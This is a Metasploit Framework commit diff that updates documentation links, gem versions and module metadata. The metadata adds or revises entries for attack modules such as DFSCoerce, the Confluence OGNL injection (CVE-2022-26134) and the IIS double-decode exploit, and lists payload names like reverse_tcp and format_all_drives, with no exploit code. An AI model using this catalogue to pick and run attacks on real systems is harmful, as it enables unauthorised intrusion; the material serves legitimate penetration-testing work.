automatic module_metadata_base.json update

Use HttpClient; remove meterpreter code; fix stager

.github/ISSUE_TEMPLATE/bug_report.md

@@ -8,8 +8,8 @@ labels: "bug"
   Please fill out each section below, otherwise, your issue will be closed. This info allows Metasploit maintainers to diagnose (and fix!) your issue as quickly as possible.
 
   Useful Links:
-  - Wiki: https://github.com/rapid7/metasploit-framework/wiki
-  - Reporting a Bug: https://github.com/rapid7/metasploit-framework/wiki/Reporting-a-Bug
+  - Wiki: https://docs.metasploit.com/
+  - Reporting a Bug: https://docs.metasploit.com/docs/using-metasploit/getting-started/reporting-a-bug.html
 
   Before opening a new issue, please search existing issues: https://github.com/rapid7/metasploit-framework/issues
 -->

.github/ISSUE_TEMPLATE/documentation.md

@@ -8,7 +8,7 @@ labels: "suggestion-docs"
   To make it easier for us to help you, please include as much useful information as possible.
 
   Useful Links:
-  - Wiki: https://github.com/rapid7/metasploit-framework/wiki
+  - Wiki: https://docs.metasploit.com/
 
   Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
 -->
@@ -33,7 +33,7 @@ Why should we document this and who will benefit from it?
 ### Draft the doc
 
 - [ ] Write the doc, following the format listed in these resources:
-  - [Overview on contributing module documentation](https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation)
+  - [Overview on contributing module documentation](https://docs.metasploit.com/docs/development/quality/writing-module-documentation.html)
   - [Docs Templates](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md)
   - [Example of a similar article]()
 

.github/ISSUE_TEMPLATE/feature_suggestion.md

@@ -8,7 +8,7 @@ labels: "suggestion-feature"
   To make it easier for us to help you, please include as much useful information as possible.
 
   Useful Links:
-  - Wiki: https://github.com/rapid7/metasploit-framework/wiki
+  - Wiki: https://docs.metasploit.com/
 
   Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
 -->

.github/ISSUE_TEMPLATE/module_suggestion.md

@@ -8,7 +8,7 @@ labels: "suggestion-module"
   To make it easier for us to help you, please include as much useful information as possible.
 
   Useful Links:
-  - Wiki: https://github.com/rapid7/metasploit-framework/wiki
+  - Wiki: https://docs.metasploit.com/
 
   Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
 -->

.github/ISSUE_TEMPLATE/question.md

@@ -8,7 +8,7 @@ labels: "question"
   To make it easier for us to help you, please include as much useful information as possible.
 
   Useful Links:
-  - Wiki: https://github.com/rapid7/metasploit-framework/wiki
+  - Wiki: https://docs.metasploit.com/
 
   Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
 -->

.github/PULL_REQUEST_TEMPLATE.md

@@ -31,4 +31,4 @@ Complex Software Examples:
 We will also accept demonstrations of successful module execution even if your module doesn't meet the above conditions. It's not a necessity, but it may help us land your module faster!
 
 Demonstration of successful module execution can take the form of a packet capture (pcap) or a screen recording. You can send pcaps and recordings to [msfdev@metasploit.com](mailto:msfdev@metasploit.com). Please include a CVE number in the subject header (if applicable), and a link to your PR in the email body.
-If you wish to sanitize your pcap, please see the [wiki](https://github.com/rapid7/metasploit-framework/wiki/Sanitizing-PCAPs).
+If you wish to sanitize your pcap, please see the [wiki](https://docs.metasploit.com/docs/development/get-started/sanitizing-pcaps.html).

Gemfile.lock

@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (6.2.3)
+    metasploit-framework (6.2.6)
       actionpack (~> 6.0)
       activerecord (~> 6.0)
       activesupport (~> 6.0)
@@ -30,7 +30,7 @@ PATH
       metasploit-concern
       metasploit-credential
       metasploit-model
-      metasploit-payloads (= 2.0.93)
+      metasploit-payloads (= 2.0.94)
       metasploit_data_models
       metasploit_payloads-mettle (= 1.0.18)
       mqtt
@@ -247,7 +247,7 @@ GEM
       activemodel (~> 6.0)
       activesupport (~> 6.0)
       railties (~> 6.0)
-    metasploit-payloads (2.0.93)
+    metasploit-payloads (2.0.94)
     metasploit_data_models (5.0.5)
       activerecord (~> 6.0)
       activesupport (~> 6.0)
@@ -351,7 +351,7 @@ GEM
       metasm
       rex-arch
       rex-text
-    rex-exploitation (0.1.30)
+    rex-exploitation (0.1.31)
       jsobfu
       metasm
       rex-arch
@@ -383,7 +383,7 @@ GEM
       rex-socket
       rex-text
     rex-struct2 (0.1.3)
-    rex-text (0.2.37)
+    rex-text (0.2.38)
     rex-zip (0.1.4)
       rex-text
     rexml (3.2.5)
@@ -427,7 +427,7 @@ GEM
     ruby-progressbar (1.11.0)
     ruby-rc4 (0.1.5)
     ruby2_keywords (0.0.5)
-    ruby_smb (3.1.3)
+    ruby_smb (3.1.6)
       bindata
       openssl-ccm
       openssl-cmac

LICENSE_GEMS

@@ -10,10 +10,10 @@ afm, 0.2.2, MIT
 arel-helpers, 2.14.0, MIT
 ast, 2.4.2, MIT
 aws-eventstream, 1.2.0, "Apache 2.0"
-aws-partitions, 1.595.0, "Apache 2.0"
+aws-partitions, 1.598.0, "Apache 2.0"
 aws-sdk-core, 3.131.1, "Apache 2.0"
 aws-sdk-ec2, 1.317.0, "Apache 2.0"
-aws-sdk-iam, 1.68.0, "Apache 2.0"
+aws-sdk-iam, 1.69.0, "Apache 2.0"
 aws-sdk-kms, 1.57.0, "Apache 2.0"
 aws-sdk-s3, 1.114.0, "Apache 2.0"
 aws-sigv4, 1.5.0, "Apache 2.0"
@@ -70,9 +70,9 @@ memory_profiler, 1.0.0, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 4.0.4, "New BSD"
 metasploit-credential, 5.0.7, "New BSD"
-metasploit-framework, 6.2.3, "New BSD"
+metasploit-framework, 6.2.6, "New BSD"
 metasploit-model, 4.0.4, "New BSD"
-metasploit-payloads, 2.0.93, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 2.0.94, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 5.0.5, "New BSD"
 metasploit_payloads-mettle, 1.0.18, "3-clause (or ""modified"") BSD"
 method_source, 1.0.0, MIT
@@ -83,7 +83,7 @@ msgpack, 1.5.2, "Apache 2.0"
 multi_json, 1.15.0, MIT
 mustermann, 1.1.1, MIT
 nessus_rest, 0.1.6, MIT
-net-ldap, 0.17.0, MIT
+net-ldap, 0.17.1, MIT
 net-protocol, 0.1.3, "ruby, Simplified BSD"
 net-smtp, 0.3.1, "ruby, Simplified BSD"
 net-ssh, 6.1.0, MIT
@@ -92,7 +92,7 @@ nexpose, 7.3.0, "New BSD"
 nio4r, 2.5.8, MIT
 nokogiri, 1.13.6, MIT
 nori, 2.6.0, MIT
-octokit, 4.23.0, MIT
+octokit, 4.24.0, MIT
 openssl-ccm, 1.2.2, MIT
 openssl-cmac, 2.0.1, MIT
 openvas-omp, 0.0.4, MIT
@@ -112,7 +112,7 @@ rack, 2.2.3.1, MIT
 rack-protection, 2.2.0, MIT
 rack-test, 1.1.0, MIT
 rails-dom-testing, 2.0.3, MIT
-rails-html-sanitizer, 1.4.2, MIT
+rails-html-sanitizer, 1.4.3, MIT
 railties, 6.1.6, MIT
 rainbow, 3.1.1, MIT
 rake, 13.0.6, MIT
@@ -137,7 +137,7 @@ rex-rop_builder, 0.1.4, "New BSD"
 rex-socket, 0.1.39, "New BSD"
 rex-sslscan, 0.1.7, "New BSD"
 rex-struct2, 0.1.3, "New BSD"
-rex-text, 0.2.37, "New BSD"
+rex-text, 0.2.38, "New BSD"
 rex-zip, 0.1.4, "New BSD"
 rexml, 3.2.5, "Simplified BSD"
 rkelly-remix, 0.0.7, MIT
@@ -148,17 +148,17 @@ rspec-mocks, 3.11.1, MIT
 rspec-rails, 5.1.2, MIT
 rspec-rerun, 1.1.0, MIT
 rspec-support, 3.11.0, MIT
-rubocop, 1.30.0, MIT
+rubocop, 1.30.1, MIT
 rubocop-ast, 1.18.0, MIT
 ruby-macho, 3.0.0, MIT
 ruby-prof, 1.4.2, "Simplified BSD"
 ruby-progressbar, 1.11.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
-ruby_smb, 3.1.3, "New BSD"
+ruby_smb, 3.1.5, "New BSD"
 rubyntlm, 0.6.3, MIT
 rubyzip, 2.3.2, "Simplified BSD"
-sawyer, 0.9.1, MIT
+sawyer, 0.9.2, MIT
 simplecov, 0.18.2, MIT
 simplecov-html, 0.12.3, MIT
 simpleidn, 0.2.1, MIT

db/modules_metadata_base.json

@@ -537,6 +537,56 @@
     "session_types": false,
     "needs_cleanup": false
   },
+  "auxiliary_admin/dcerpc/samr_computer": {
+    "name": "SAMR Computer Management",
+    "fullname": "auxiliary/admin/dcerpc/samr_computer",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "JaGoTu",
+      "Spencer McIntyre"
+    ],
+    "description": "Add, lookup and delete computer accounts via MS-SAMR. By default\n          standard active directory users can add up to 10 new computers to the\n          domain. Administrative privileges however are required to delete the\n          created accounts.",
+    "references": [
+      "URL-https://github.com/SecureAuthCorp/impacket/blob/master/examples/addcomputer.py"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 445,
+    "autofilter_ports": [
+      139,
+      445
+    ],
+    "autofilter_services": [
+      "netbios-ssn",
+      "microsoft-ds"
+    ],
+    "targets": null,
+    "mod_time": "2022-06-28 11:53:05 +0000",
+    "path": "/modules/auxiliary/admin/dcerpc/samr_computer.rb",
+    "is_install_path": true,
+    "ref_name": "admin/dcerpc/samr_computer",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+
+      ],
+      "Stability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
   "auxiliary_admin/dns/dyn_dns_update": {
     "name": "DNS Server Dynamic Update Record Injection",
     "fullname": "auxiliary/admin/dns/dyn_dns_update",
@@ -19439,7 +19489,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2021-02-17 12:33:59 +0000",
+    "mod_time": "2022-06-22 19:44:53 +0000",
     "path": "/modules/auxiliary/gather/memcached_extractor.rb",
     "is_install_path": true,
     "ref_name": "gather/memcached_extractor",
@@ -22199,6 +22249,48 @@
     "session_types": false,
     "needs_cleanup": false
   },
+  "auxiliary_scanner/dcerpc/dfscoerce": {
+    "name": "DFSCoerce",
+    "fullname": "auxiliary/scanner/dcerpc/dfscoerce",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Wh04m1001",
+      "xct_de",
+      "Spencer McIntyre"
+    ],
+    "description": "Coerce an authentication attempt over SMB to other machines via MS-DFSNM methods.",
+    "references": [
+      "URL-https://github.com/Wh04m1001/DFSCoerce"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 445,
+    "autofilter_ports": [
+      139,
+      445
+    ],
+    "autofilter_services": [
+      "netbios-ssn",
+      "microsoft-ds"
+    ],
+    "targets": null,
+    "mod_time": "2022-06-30 17:38:30 +0000",
+    "path": "/modules/auxiliary/scanner/dcerpc/dfscoerce.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/dcerpc/dfscoerce",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
   "auxiliary_scanner/dcerpc/endpoint_mapper": {
     "name": "Endpoint Mapper Service Discovery",
     "fullname": "auxiliary/scanner/dcerpc/endpoint_mapper",
@@ -22344,7 +22436,7 @@
       "microsoft-ds"
     ],
     "targets": null,
-    "mod_time": "2022-01-31 13:50:19 +0000",
+    "mod_time": "2022-06-30 15:12:23 +0000",
     "path": "/modules/auxiliary/scanner/dcerpc/petitpotam.rb",
     "is_install_path": true,
     "ref_name": "scanner/dcerpc/petitpotam",
@@ -38266,6 +38358,53 @@
     "session_types": false,
     "needs_cleanup": false
   },
+  "auxiliary_scanner/misc/freeswitch_event_socket_login": {
+    "name": "FreeSWITCH Event Socket Login",
+    "fullname": "auxiliary/scanner/misc/freeswitch_event_socket_login",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "krastanoel"
+    ],
+    "description": "This module tests FreeSWITCH Event Socket logins on a range of\n          machines and report successful attempts.",
+    "references": [
+      "URL-https://freeswitch.org/confluence/display/FREESWITCH/mod_event_socket"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 8021,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2022-07-01 12:22:31 +0000",
+    "path": "/modules/auxiliary/scanner/misc/freeswitch_event_socket_login.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/misc/freeswitch_event_socket_login",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-service-restarts"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
   "auxiliary_scanner/misc/ib_service_mgr_info": {
     "name": "Borland InterBase Services Manager Information",
     "fullname": "auxiliary/scanner/misc/ib_service_mgr_info",
@@ -73335,7 +73474,7 @@
     "description": "This module exploits a buffer overflow in the RTSP request parsing\n        code of Hikvision DVR appliances. The Hikvision DVR devices record\n        video feeds of surveillance cameras and offer remote administration\n        and playback of recorded footage.\n\n        The vulnerability is present in several models / firmware versions\n        but due to the available test device this module only supports\n        the DS-7204 model.",
     "references": [
       "CVE-2014-4880",
-      "URL-https://www.rapid7.com/blog/post/2014/11/19/r7-2014-18-hikvision-dvr-devices--multiple-vulnerabilities"
+      "URL-https://www.rapid7.com/blog/post/2014/11/19/r7-2014-18-hikvision-dvr-devices-multiple-vulnerabilities"
     ],
     "platform": "Linux",
     "arch": "armle",
@@ -73350,7 +73489,7 @@
       "DS-7204 Firmware V2.2.10 build 131009",
       "Debug Target"
     ],
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2022-06-22 15:49:43 +0000",
     "path": "/modules/exploits/linux/misc/hikvision_rtsp_bof.rb",
     "is_install_path": true,
     "ref_name": "linux/misc/hikvision_rtsp_bof",
@@ -80620,13 +80759,13 @@
     ],
     "description": "This module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to\n          evaluate an OGNL expression resulting in OS command execution.",
     "references": [
-      "CVE-2021-26084",
+      "CVE-2022-26134",
       "URL-https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro",
       "URL-https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py",
       "URL-https://github.com/jbaines-r7/through_the_wire",
       "URL-https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis"
     ],
-    "platform": "Linux,Unix",
+    "platform": "Linux,Unix,Windows",
     "arch": "cmd, x86, x64",
     "rport": 8090,
     "autofilter_ports": [
@@ -80646,9 +80785,11 @@
     ],
     "targets": [
       "Unix Command",
-      "Linux Dropper"
+      "Linux Dropper",
+      "Windows Command",
+      "Windows Dropper"
     ],
-    "mod_time": "2022-06-06 22:03:21 +0000",
+    "mod_time": "2022-06-15 17:11:56 +0000",
     "path": "/modules/exploits/multi/http/atlassian_confluence_namespace_ognl_injection.rb",
     "is_install_path": true,
     "ref_name": "multi/http/atlassian_confluence_namespace_ognl_injection",
@@ -87840,7 +87981,7 @@
       "PHPMailer <5.2.18",
       "PHPMailer 5.2.18 - 5.2.19"
     ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2022-06-29 12:24:29 +0000",
     "path": "/modules/exploits/multi/http/phpmailer_arg_injection.rb",
     "is_install_path": true,
     "ref_name": "multi/http/phpmailer_arg_injection",
@@ -95461,7 +95602,7 @@
       "Linux",
       "Windows"
     ],
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2022-06-28 17:02:51 +0000",
     "path": "/modules/exploits/multi/misc/nomad_exec.rb",
     "is_install_path": true,
     "ref_name": "multi/misc/nomad_exec",
@@ -95472,11 +95613,11 @@
       "Stability": [
         "crash-safe"
       ],
-      "Reliability": [
+      "SideEffects": [
         "artifacts-on-disk",
         "ioc-in-logs"
       ],
-      "SideEffects": [
+      "Reliability": [
         "repeatable-session"
       ]
     },
@@ -146709,7 +146850,7 @@
     "author": [
       "jduck <jduck@metasploit.com>"
     ],
-    "description": "This module will execute an arbitrary payload on a Microsoft IIS installation\n          that is vulnerable to the CGI double-decode vulnerability of 2001.\n\n          NOTE: This module will leave a metasploit payload in the IIS scripts directory.",
+    "description": "This module will execute an arbitrary payload on a Microsoft IIS installation\n          that is vulnerable to the CGI double-decode vulnerability of 2001.\n\n          This module has been tested successfully on:\n\n          Windows 2000 Professional (SP0) (EN);\n          Windows 2000 Professional (SP1) (AR);\n          Windows 2000 Professional (SP1) (CZ);\n          Windows 2000 Server (SP0) (FR);\n          Windows 2000 Server (SP1) (EN); and\n          Windows 2000 Server (SP1) (SE).\n\n          Note: This module will leave a Metasploit payload exe in the IIS scripts directory.",
     "references": [
       "CVE-2001-0333",
       "OSVDB-556",
@@ -146721,15 +146862,25 @@
     "arch": "",
     "rport": 80,
     "autofilter_ports": [
-
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
     ],
     "autofilter_services": [
-
+      "http",
+      "https"
     ],
     "targets": [
-      "Automatic"
+      "Windows (Dropper)",
+      "Windows (Command)"
     ],
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-07-03 18:22:55 +0000",
     "path": "/modules/exploits/windows/iis/ms01_026_dbldecode.rb",
     "is_install_path": true,
     "ref_name": "windows/iis/ms01_026_dbldecode",
@@ -146737,6 +146888,16 @@
     "post_auth": false,
     "default_credential": false,
     "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
     },
     "session_types": false,
     "needs_cleanup": true
@@ -170759,7 +170920,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/adduser",
@@ -170798,7 +170959,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/dllinject/bind_hidden_ipknock_tcp",
@@ -170837,7 +170998,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/dllinject/bind_hidden_tcp",
@@ -170875,7 +171036,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/dllinject/bind_ipv6_tcp",
@@ -170914,7 +171075,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/dllinject/bind_ipv6_tcp_uuid",
@@ -170951,7 +171112,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/dllinject/bind_named_pipe",
@@ -170988,7 +171149,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/dllinject/bind_nonx_tcp",
@@ -171026,7 +171187,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/dllinject/bind_tcp",
@@ -171066,7 +171227,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/dllinject/bind_tcp_rc4",
@@ -171104,7 +171265,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/dllinject/bind_tcp_uuid",
@@ -171141,7 +171302,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/dllinject/find_tag",
@@ -171180,7 +171341,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/dllinject/reverse_hop_http",
@@ -171217,7 +171378,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/dllinject/reverse_http",
@@ -171254,7 +171415,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/dllinject/reverse_http_proxy_pstore",
@@ -171292,7 +171453,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/dllinject/reverse_ipv6_tcp",
@@ -171329,7 +171490,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/dllinject/reverse_nonx_tcp",
@@ -171366,7 +171527,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/dllinject/reverse_ord_tcp",
@@ -171404,7 +171565,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp",
@@ -171442,7 +171603,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_allports",
@@ -171481,7 +171642,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_dns",
@@ -171521,7 +171682,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_rc4",
@@ -171561,7 +171722,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_rc4_dns",
@@ -171599,7 +171760,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_uuid",
@@ -171637,7 +171798,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/dllinject/reverse_winhttp",
@@ -171672,7 +171833,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/dns_txt_query_exec",
@@ -171707,7 +171868,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/download_exec",
@@ -171743,7 +171904,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/exec",
@@ -171780,7 +171941,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/format_all_drives",
@@ -171818,7 +171979,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/generic/debug_trap",
@@ -171853,7 +172014,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/generic/tight_loop",
@@ -171889,7 +172050,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/loadlibrary",
@@ -171925,7 +172086,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/messagebox",
@@ -171965,7 +172126,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
